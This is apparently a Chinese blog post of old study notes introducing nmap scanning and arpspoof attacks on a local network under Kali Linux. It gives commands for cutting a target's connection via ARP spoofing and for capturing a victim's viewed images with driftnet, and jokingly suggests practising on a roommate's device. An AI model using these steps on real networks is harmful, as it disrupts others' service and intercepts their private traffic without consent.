文中可能存在錯誤操做或錯誤理解,望你們不吝指正. 同時也但願能夠幫助到想要學習接觸此方面、或興趣使然的你,讓你有個大概的印象.
!閱前須知!
本文是基於我幾年前的一本筆記本,上面記錄了我學習網絡基礎時的部分筆記.
本文中的工具可能已通過時,或使用方法已經改變了,感興趣能夠深刻查閱資料
(可是我仍是列出之前的使用方法供你們借鑑).html
ps.若對無線攻擊手段與WiFi破解感興趣能夠參考如下兩篇文章
【無線安全實踐入門】基礎攻擊手段與經常使用工具簡介
【無線安全實踐入門】破解WiFi密碼的多個方法linux
ps.本文環境在Kali下,學習最好具有一點linux基礎知識.
安全
NMap(Network Mapper),一個很不錯的網絡掃描和嗅探工具包網絡
--NMap真的很經常使用,簡直神器 --列出幾種簡單的使用方法: --ping掃描,快速,不過回顯的內容有限 > nmap -sP (網關IP)/(子網掩碼) --SYN/半開放掃描,加上-A回顯詳細信息 > nmap -sS [-A] (網關IP)/(子網掩碼) --單個掃描,顯示詳細內容 > nmap -A (目標IP) --示例 > nmap -sP 192.168.1.1/24
局域網中的ARP欺騙仍是比較有意思的.像arpspoof、Ettercap等工具都很不錯.
arp欺騙以後其實能夠不少動做的...
這裏就介紹老掉牙的arpspoof的斷網攻擊和圖片捕獲.app
ps.有條件的話,能夠拿手機或者室友電腦練手(doge臉).工具
--首先,在局域網環境中配合NMap工具使用,取得目標IP > nmap -sP (網關IP)/(子網掩碼)
2.1.斷網攻擊學習
ps.修改ip_forward的值,是爲了開啓IP轉發,其值爲'0'時候則禁止轉發,目標主機斷網.測試
--修改ip_forward(默認爲'0') --能夠提早cat查看一下,如果回顯'0',則能夠跳過本步 > echo 0 > /proc/sys/net/ipv4/ip_forward --開始arp欺騙 > arpspoof -i (你的網卡名稱) -t (目標IP) (網關IP) --使用目標主機上網測試,觀察命令行回顯.
2.2.圖片捕獲命令行
--修改ip_forward(默認爲'0') --能夠提早cat查看一下,如果回顯'1',則能夠跳過本步 > echo 1 > /proc/sys/net/ipv4/ip_forward --開始arp欺騙(本機網卡名,能夠用ifconfig來查看) > arpspoof -i (本機網卡名) -t (目標IP) (網關IP) --另外再開一終端,開始抓取圖片 > drifnet -i (本機網卡名) --使用目標主機上網看圖片,觀察彈出的窗口回顯圖片,觀察命令行回顯.
常見的網絡協議是網絡安全中的基礎,能讓你可以更快吸取了解技術細節.code
加油,共勉